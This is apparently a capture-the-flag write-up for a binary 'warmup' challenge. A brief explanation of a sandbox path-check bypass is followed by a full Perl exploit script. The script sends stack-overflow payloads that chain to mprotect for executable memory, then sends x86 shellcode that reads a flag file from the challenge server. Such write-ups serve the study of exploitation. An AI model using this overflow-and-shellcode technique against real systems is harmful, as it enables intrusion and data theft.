Tags: bin 

Rating: 0

Exploit warmup, make rwx memory using mprotect to write shellcode,
use mmap() to create only readable memory, read /home/sandbox/flag into it, and call open(), read(), write().
The sandbox will try to validate the path using process_vm_readv() but it'll just fail, causing realpath() to fail too and
thus bypass the path check.

-- @_cutz



use cutztools;

$sock = new sock("202.120.7.207", 52608);

# prepare stack
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x080480D8) . # start
p32(0x1000) . # pagesize
p32(7)x3 # prot
);
print $sock->readline();

# prepare more stack
print $sock->readline();
$sock->print(
"A"x32 .
p32(0x080480D8) . # start
"A"x4 .
p32(0x08048122) . # syscall
p32(0x08049000) . # bss
p32(0x08049000)
);
print $sock->readline();

# more
for (1 .. 2) {
print $sock->readline();
$sock->print(
"B"x32 .
p32(0x080480D8) .
"B"x16
);
print $sock->readline();
}

print $sock->readline();
$sock->print(
"B"x32 .
p32(0x0804811D) . # read
p32(0x080481B8) . # add esp, 0x30
p32(0) . # stdin
p32(0x08049000) . # bss
p32(125) # 125 -> mprotect
);
print $sock->readline();

$assembler = new assembler();
$assembler->assemble32('
_start:
movl $90, %eax
movl $0x08049500, %ebx
movl $0x13370000, (%ebx)
movl $0x2000, 4(%ebx)
movl $2, 8(%ebx)
movl $0x32, 12(%ebx)
int $0x80

movl $3, %eax
xorl %ebx, %ebx
movl $0x13370000, %ecx
movl $0xff, %edx
loop:
movl $3, %eax
int $0x80
addl $0xff, %ecx
cmp $0xff, %eax
je loop
movl $0x13370000, %ebx
movl $5, %eax
xorl %ecx, %ecx
int $0x80
movl %eax, %esi
read:
movl %esi, %ebx
movb $3, %al
subl $1, %esp
lea (%esp), %ecx
movb $25, %dl
int $0x80

movl $4, %eax
movl $1, %ebx
movl $25, %edx
int $0x80
');

$shellcode = $assembler->raw();
$sock->print($shellcode . "A"x(125-length $shellcode) . "/home/sandbox/flag\x00");
print $sock->readnum(1024);